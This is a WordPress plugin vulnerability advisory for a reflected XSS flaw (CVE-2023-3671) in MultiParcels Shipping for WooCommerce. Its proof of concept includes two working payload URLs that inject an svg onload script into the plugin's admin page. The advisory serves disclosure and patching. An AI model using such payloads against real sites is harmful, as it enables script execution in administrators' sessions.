MultiParcels Shipping For WooCommerce < 1.15.4 – Reflected XSS | CVE 2023-3671 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape various parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Note: The issue was fixed in 1.14.15 but re-introduced in 1.14.16

Proof of Concept

Make a logged in admin open one of the URL below:

http://example.com/wp-admin/admin.php?page=multiparcels-shipping-for-woocommerce&tab=sender-details&data[name]='><svg/onload=alert(/XSS/)>
http://example.com/wp-admin/admin.php?page=multiparcels-shipping-for-woocommerce&tab=sender-details&errors[name][][text]=<svg/onload=alert(/XSS/)>

Affects Plugins

multiparcels-shipping-for-woocommerce

Fixed in 1.15.4

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

8b765f39-38e0-49c7-843a-a5b9375a32e7

Timeline

Publicly Published

2023-07-17 (about 10 months ago)

Added

2023-07-17 (about 10 months ago)

Last Updated

2023-07-27 (about 9 months ago)

Other

Published

Title

Published

2023-02-20

Title

Juicer < 1.11 - Contributor+ Stored XSS

Published

2016-12-07

Title

WooCommerce <= 2.6.8 - Authenticated Tax-Rate CSV XSS

Published

2022-04-11

Title

Photo Gallery < 1.6.3 - Reflected Cross-Site Scripting

Published

2021-11-02

Title

Ivory Search < 4.8 - Contributor+ Stored Cross-Site Scripting

Published

2014-08-01

Title

cleeng <= 2.3.2 - XSS in ZeroClipboard